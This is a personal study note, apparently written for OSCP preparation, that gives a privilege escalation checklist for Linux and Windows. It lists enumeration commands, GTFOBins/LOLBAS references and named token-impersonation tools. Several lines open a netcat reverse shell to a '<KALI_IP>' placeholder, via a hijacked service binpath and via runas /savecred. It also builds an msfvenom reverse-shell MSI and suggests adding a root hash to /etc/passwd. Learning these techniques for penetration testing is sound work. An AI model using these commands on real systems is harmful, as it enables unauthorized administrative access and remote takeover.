03 Privilege Escalation Guide
Created: 2026-07-24 13:50
#note
🔑 Privilege Escalation Quick Reference Guide
[!tip] Golden Rule
Always run automated scripts (linpeas.sh/winPEAS.exe/PrivescCheck.ps1) first, then manually verify suspicious findings using GTFOBins or LOLBAS.
🐧 Linux Privilege Escalation Checklist
Sudo Privileges (
sudo -l):- Check binaries against GTFOBins.
- Check environment variables:
env_keep+=LD_PRELOADorenv_keep+=PYTHONPATH.
SUID / SGID Binaries:
find / -perm -u=s -type f 2>/dev/nullCron Jobs & System Timers:
cat /etc/crontab /etc/cron.*/* pspy64 # Monitor real-time processes without rootCapabilities:
getcap -r / 2>/dev/nullWritable Configuration Files:
/etc/passwd(writable -> add root user hash)./etc/exports(NFSno_root_squash).
🪟 Windows Privilege Escalation Checklist
Token Impersonation (SeImpersonatePrivilege / SeAssignPrimaryToken):
- Use
PrintSpoofer.exe,GodPotato.exe, orJuicyPotatoNG.exe.
- Use
Unquoted Service Paths:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"Insecure Service Permissions:
accesschk.exe /accepteula -uwcqv "Authenticated Users" * sc config <SERVICE_NAME> binpath= "C:\temp\nc.exe -e cmd.exe <KALI_IP> 4444" sc start <SERVICE_NAME>AlwaysInstallElevated:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated- If both equal
1, generate malicious.msiviamsfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f msi -o reverse.msiand runmsiexec /quiet /qn /i reverse.msi.
- If both equal
Saved Credentials in Registry / Files:
cmdkey /list runas /savecred /user:administrator "C:\temp\nc.exe -e cmd.exe <KALI_IP> 4444"
🔗 Useful External Links
- Tib3rius Linux PrivEsc Cheatsheet
- Tib3rius Windows PrivEsc Cheatsheet
- PEASS-ng Repository
- GTFOBins
- LOLBAS Project
Tags
#oscp #privesc #linux #windows #gtfobins #lolbas #linpeas #winpeas
Local Knowledge Graph